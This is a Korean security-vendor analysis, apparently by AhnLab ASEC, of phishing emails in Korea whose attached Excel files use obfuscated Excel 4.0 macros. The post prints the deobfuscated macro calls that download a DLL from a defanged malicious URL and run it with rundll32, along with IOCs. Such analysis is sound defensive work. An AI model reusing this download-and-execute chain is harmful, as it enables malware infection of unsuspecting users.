ASEC 분석팀은 매크로 시트(Excel 4.0 macro sheet)를 이용한 악성 엑셀 문서가 피싱 메일을 통해 국내에 다수 유포 중임을 확인하였다. 매크로 시트를 이용한 방식은 악성코드 유포자가 자주 사용하는 방식으로, 지난 10월 Qakbot 유포에도 사용되었다.
피싱 메일은 아래와 같으며, 한국어가 사용된 점으로 보아 국내 사용자를 대상으로 유포된 것으로 추정된다. 또한 해당 메일은 실제 발송된 정상 메일을 활용한 것을 확인할 수 있다. 사용자는 해당 부분으로 인해 정상 메일로 인지할 수 있어, 큰 주의가 필요하다.
메일에는 압축 파일(ZIP)이 첨부되어 있으며, 압축 파일 내부에 악성 엑셀 문서(XLS)를 포함하고 있다.
사용자가 압축 파일 내부의 엑셀 문서를 실행하게 되면, 아래와 같이 매크로 사용을 유도하는 문구를 확인할 수 있다.
해당 문서는 매크로 시트를 이용하여 난독화된 문자열을 조합 후 악성 행위를 수행한다. 매크로 실행시 자동으로 실행되는 Auto_Open 함수는 아래 위치에 존재하며, 해당 부분의 값이 공백이기 때문에 다음 행을 실행하게 된다.
많은 공백을 지나 684 번째 행부터 실제 코드를 실행하게 되며, 숨겨진 시트에 존재하는 문자열들을 이용하여 난독화를 해제한다.
난독화 해제 후, 최종적으로 실행되는 코드는 아래와 같다. “C:\AutoCadest\AutoCadest2” 경로의 폴더를 생성한 후 악성 url 에 접속하여 추가 파일 다운로드를 시도한다. 악성 url 에 접속이 성공할 경우 해당 폴더에 Fikast.dll 명으로 파일을 다운로드하며 EXEC 함수를 통해 해당 파일을 실행하게 된다.
- REGISTER(“Kernel32”, “CreateDirectoryA”, “JCJ”, “YTYFBFTYYFTDFTYFBYFKYTFBY”, , 1, 9)
- YTYFBFTYYFTDFTYFBYFKYTFBY(“C:\AutoCadest\AutoCadest2”, 0)
- REGISTER(“URLMon”, “URLDownloadToFileA”, “IICCII”, “DFGYUJTYGSRYHEDRTSDGS”, , 0, 0)
- DFGYUJTYGSRYHEDRTSDGS(0, hxxp://angeshemaria.com/gwyzlymd/923753.jpg“, “C:\AutoCadest\AutoCadest2\Fikast.dll“, 0, 0)
- EXEC(“rundll32 C:\AutoCadest\AutoCadest2\Fikast.dll, DllRegisterServer”)
최근 국내 사용자를 대상으로 정상 메일을 활용한 피싱 메일이 유포되고 있다. 사용자는 발신자 정보에 대한 확인이 필요하며, 출처가 불분명한 메일의 첨부파일은 열람시 주의가 필요하다.
현재 안랩 V3에서는 이와 같은 악성코드를 다음과 같은 진단명으로 진단하고 있다.
[파일 진단]
Downloader/XLS.XLMacro (2020.11.25.07)
[IOC]
56332adb895de05d9378d8de27c2d1ac (XLS)
hxxp://angeshemaria.com/gwyzlymd/923753.jpg
Categories:악성코드 정보